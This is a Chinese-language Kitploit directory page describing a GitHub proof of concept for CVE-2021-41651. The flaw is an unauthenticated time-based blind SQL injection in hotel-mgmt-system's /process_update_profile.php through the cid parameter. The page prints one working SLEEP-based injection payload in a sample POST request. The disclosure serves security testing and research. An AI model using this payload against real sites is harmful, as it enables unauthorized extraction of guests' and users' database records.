Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41651 — CVE-2021-41651 的概念验证漏洞利用,演示了 hotel-mgmt-system 中通过 cid 参数实现未经身份验证的基于时间的盲 SQL 注入,从而能够从 MySQL 中提取敏感数据。 | Kitploit
工具/GitHubGitHub/mobiusbinary/cve-2021-41651
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

CVE-2021-41651 的概念验证漏洞利用,演示了 hotel-mgmt-system 中通过 cid 参数实现未经身份验证的基于时间的盲 SQL 注入,从而能够从 MySQL 中提取敏感数据。

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41651

CVE-2021-41651 hotel-mgmt-system 中的 SQL 注入漏洞

hotel-mgmt-system 存在未认证的基于时间的盲注 SQL 注入漏洞。

/process_update_profile.php 页面中的 cid 参数未对用户输入进行过滤,攻击者可提取底层 MySQL 数据库中的敏感数据。

应用程序链接

hotel-mgmt-system

受影响组件与参数

URL: /process_update_profile.php
参数:cid

PoC

SQLMAP 载荷

/process_update_profile.php 页面上的 cid 参数

参数:cid(自定义)POST 类型:基于时间的盲注 标题:MySQL >= 5.0.12 AND 基于时间的盲注 (query SLEEP) 载荷:phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

若 PoC 图片不清晰,请点击 GIF,将以更高分辨率加载。

POC - CID

发现者

Jason Colyvas
MOBIUSBINARY
2021年9月23日

下载工具